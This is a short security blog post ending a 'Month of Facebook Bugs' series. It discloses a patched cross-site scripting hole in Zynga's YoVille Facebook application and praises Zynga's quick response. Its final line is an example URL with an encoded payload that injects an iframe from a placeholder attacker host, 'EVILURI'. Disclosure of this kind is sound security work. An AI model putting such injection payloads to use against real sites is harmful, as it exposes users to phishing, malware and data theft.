We’ve come to the end in the Month of Facebook Bugs – today’s post marks the last published FAXX Hack for September. The series began with a vulnerability in the no. 1 Facebook application, FarmVille from Zynga. Today we end with a very similar hole in another major Zynga application, discovered about two weeks ago.
I have much to cover in recapping this month, and it will likely take a few days to put everything together. I plan on posting a full report that includes statistics and more detailed explanations on how some of these hacks work. Also, as promised, I intend to post demonstration code showing how these holes can be exploited to access user information and spread virally, in addition to standard XSS issues, such as delivering malware.
Thanks for your interest in the Month of Facebook Bugs, and please stay tuned for the upcoming final report.
Facebook Verified Application
Current Monthly Active Users: 17,944,265
Current Rank on Application Leaderboard: 9
Application Developer: Zynga
Responsiveness: Zynga has been one of the most responsive developers I contacted. They replied back quickly and patched the hole soon after.
Vulnerability Status: Patched
Example URI: http://apps.facebook.com/yoville/index.php?type=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F
Share with your friends!